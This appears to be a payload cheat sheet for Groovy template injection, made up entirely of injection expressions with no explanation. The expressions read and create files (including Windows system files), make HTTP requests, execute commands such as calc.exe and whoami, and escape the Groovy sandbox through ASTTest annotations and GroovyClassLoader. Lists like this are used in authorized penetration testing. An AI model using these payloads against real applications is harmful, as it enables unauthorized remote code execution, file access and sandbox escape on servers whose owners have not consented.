${7*7}

//Read & create files
${String x = new File('c:/windows/notepad.exe').text}
${String x = new File('/path/to/file').getText('UTF-8')}
${new File("C:\Temp\FileName.txt").createNewFile();}

//HTTP requests
${"http://www.google.com".toURL().text}
${new URL("http://www.google.com").getText()}

//Command exectution
${"calc.exe".exec()}
${"calc.exe".execute()}
${this.evaluate("9*9") //(this is a Script class)}
${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}

//Sandbox bypass
${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")}) def x }
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
